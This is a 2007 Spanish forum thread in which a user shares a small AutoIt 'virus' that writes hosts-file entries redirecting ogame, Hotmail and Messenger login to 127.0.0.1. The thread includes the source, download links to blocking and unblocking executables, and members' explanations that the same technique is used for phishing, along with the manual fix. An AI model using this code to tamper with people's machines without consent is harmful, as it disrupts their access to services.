elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 07:18  


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  pequeño pero jodido 'virus', si se puede decir asi
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: pequeño pero jodido 'virus', si se puede decir asi  (Leído 2,926 veces)
olivarra1

Desconectado Desconectado

Mensajes: 12


Ver Perfil
pequeño pero jodido 'virus', si se puede decir asi
« en: 20 Diciembre 2007, 00:08 »

ahí va mi primer aporte ^^
he hecho un pequeño pero algo jodido virus que te bloquea permanentemente (es impossible de encontrar el archivo de registro) (a no ser que se haga format c, logicamente) la entrada a una pagina web desde tu ordenata (si vas a otro ya te deja). Esto incluye no poderse conectar con el messenger dado que para conectarse usa la direccion login.live.com.

Yo escribo en un lenguaje que se llama "Autoit" poco conocido, facil de usar pero poco potente. si hay gente que lo conoce, pondre el codigo aqui, sino me podeis pedir que paginas quereis que os bloquee.

a la vez he hecho un programa que los desbloquea. os dejo 2 programas, uno que bloquea el ogame (www.ogame.com.es) , el messenger y el hotmail, y otro que lo desbloquea todo ^^

x si el de desbloquear tiene algun bug, lo que teneis que hacer es ir a C:\WINDOWS\system32\drivers\etc\, abrir el archivo hosts con el bloc de notas y dejar solo el primer elemento de la lista.

x cierto, es necesario reiniciar el navegador o el messenger para que de efecto.

Código:
bloquear: http://genb.unlugar.com/bloquear.exe
desbloquear: http://genb.unlugar.com/desbloquear.exe

estoy abierto a dudas y/o peticiones (si no son demasiadas :P)

salu2,
olivarra1
En línea
K-19


Desconectado Desconectado

Mensajes: 425


Sarah Wayne


Ver Perfil WWW
Re: pequeño pero jodido 'virus', si se puede decir asi
« Respuesta #1 en: 20 Diciembre 2007, 00:46 »

Alguien que lo haya probado?? :rolleyes:
En línea

Stone_FREE_


Desconectado Desconectado

Mensajes: 376



Ver Perfil
Re: pequeño pero jodido 'virus', si se puede decir asi
« Respuesta #2 en: 20 Diciembre 2007, 01:37 »

Probando probando 1...2...3...  ::)

EDIT:
El programa cumple su cometido de bloquear la página de hotmail. Lo que hace es modificar la tabla del archivo host para que cada vez que intentemos conectarnos a cierta página, nos redireccione a localhost 127.0.0.1 y nunca se pueda establecer la conexión. La cura, simplemente borrar esas entradas en el archivo host. Esta es una técnica que utilizan algunos virus para hacer phishing.

olivarra, para lo que hace éste programa, es muy pesado el archivo. Optimiza el debug y pásale el upx (upx bloquear.exe). Por lo que he visto, el programa está hecho en Visual C++
« Última modificación: 20 Diciembre 2007, 02:30 por Stone_FREE_ » En línea

You are the Owner of your Life, your Fears and your Dreams ...

olivarra1

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: pequeño pero jodido 'virus', si se puede decir asi
« Respuesta #3 en: 20 Diciembre 2007, 17:06 »

Probando probando 1...2...3...  ::)

EDIT:
El programa cumple su cometido de bloquear la página de hotmail. Lo que hace es modificar la tabla del archivo host para que cada vez que intentemos conectarnos a cierta página, nos redireccione a localhost 127.0.0.1 y nunca se pueda establecer la conexión. La cura, simplemente borrar esas entradas en el archivo host. Esta es una técnica que utilizan algunos virus para hacer phishing.

olivarra, para lo que hace éste programa, es muy pesado el archivo. Optimiza el debug y pásale el upx (upx bloquear.exe). Por lo que he visto, el programa está hecho en Visual C++

mhh no señor, no esta hecho en c++, de este idioma no tengo ni idea  :-X ^^

es autoit os dejo el codigo:
$archivo = FileOpen("C:\WINDOWS\system32\drivers\etc\hosts", 1)
FileWriteLine($archivo, @CRLF & "127.0.0.1 www.ogame.com.es") ;prohibe la entrada a ogame.com.es
FileWriteLine($archivo, @CRLF & "127.0.0.1 login.live.com") ;prohibe el login de hormail y de messenger
FileWriteLine($archivo, @CRLF & "127.0.0.1 by123w.bay123.mail.live.com") ;prohibe la entrada a la pagina principal de hotmail
FileClose($archivo)

lo k no se es como bajar su peso. es el problema que tiene autoit, que tambien consume muchissima CPU en loops (miras el administrador de tareas y ocupa entre un 90 i un 97% de la CPU....  :huh:

olivarra1
En línea
BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.004


Ver Perfil
Re: pequeño pero jodido 'virus', si se puede decir asi
« Respuesta #4 en: 20 Diciembre 2007, 17:14 »

No tengo ni idea de autoit, es la primera vez que lo uso.

Quizás no sea un lenguaje de programación, y sea algo asi como un interprete, que pase sus comandos y luego se compile en C++...
De ahí, su tamaño grande y probablemente, consumo.


Ese código pasado a C, saldría un ejecutable de un par de KB., por no decir menos.

Un saludo
En línea
mauro89


Desconectado Desconectado

Mensajes: 301

Sin TexTo PerSoNaL


Ver Perfil WWW
Re: pequeño pero jodido 'virus', si se puede decir asi
« Respuesta #5 en: 20 Diciembre 2007, 17:43 »

ni sabia q existia este lenguaje de programacion, pero viendo el codigo a simple vista se ve que hace lo que dice stone free. es la  famosa tecnica que usan para robar cuentas bancarias, si alguien quiere un buen manual sobre esto pueden ver en este post http://foro.elhacker.net/index.php/topic,151732.0.html


saludos
En línea

Sai-To

Desconectado Desconectado

Mensajes: 180


Ver Perfil
Re: pequeño pero jodido 'virus', si se puede decir asi
« Respuesta #6 en: 20 Diciembre 2007, 19:29 »

Esta bueno, ya lo habia visto, pero de otra persona que lo hace por medio del batch, es mas "rapido" y no necesita ser reiniciada la maquina! ;)

Salu2's! 8)
En línea
olivarra1

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: pequeño pero jodido 'virus', si se puede decir asi
« Respuesta #7 en: 20 Diciembre 2007, 22:38 »

ni sabia q existia este lenguaje de programacion, pero viendo el codigo a simple vista se ve que hace lo que dice stone free. es la  famosa tecnica que usan para robar cuentas bancarias, si alguien quiere un buen manual sobre esto pueden ver en este post http://foro.elhacker.net/index.php/topic,151732.0.html
saludos
muy interesante este "topico" ^^

Por otra parte, se tiene que reiniciar el internet explorer y el mesenger, no toda la maquina ;)

olivarra1
En línea
alzehimer_cerebral


Desconectado Desconectado

Mensajes: 515



Ver Perfil WWW
Re: pequeño pero jodido 'virus', si se puede decir asi
« Respuesta #8 en: 22 Diciembre 2007, 23:19 »

Podriais postear el codigo??? Parece interesante, sobre todo me gustaria intentar traducirlo a c o c++. 

Salu2

alzehimer_cerebral
En línea

Servicios Informaticos Valencia - www.ag-solutions.es
Mi blog - www.alvarogarciasolano.com
mauro89


Desconectado Desconectado

Mensajes: 301

Sin TexTo PerSoNaL


Ver Perfil WWW
Re: pequeño pero jodido 'virus', si se puede decir asi
« Respuesta #9 en: 22 Diciembre 2007, 23:49 »

Podriais postear el codigo??? Parece interesante, sobre todo me gustaria intentar traducirlo a c o c++. 

Salu2

alzehimer_cerebral

ya lo postio al codigo

Citar
es autoit os dejo el codigo:
$archivo = FileOpen("C:\WINDOWS\system32\drivers\etc\hosts", 1)
FileWriteLine($archivo, @CRLF & "127.0.0.1 www.ogame.com.es") ;prohibe la entrada a ogame.com.es
FileWriteLine($archivo, @CRLF & "127.0.0.1 login.live.com") ;prohibe el login de hormail y de messenger
FileWriteLine($archivo, @CRLF & "127.0.0.1 by123w.bay123.mail.live.com") ;prohibe la entrada a la pagina principal de hotmail
FileClose($archivo)
En línea

alzehimer_cerebral


Desconectado Desconectado

Mensajes: 515



Ver Perfil WWW
Re: pequeño pero jodido 'virus', si se puede decir asi
« Respuesta #10 en: 23 Diciembre 2007, 00:41 »

Y algun compilador para dicho lenguaje??
En línea

Servicios Informaticos Valencia - www.ag-solutions.es
Mi blog - www.alvarogarciasolano.com
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines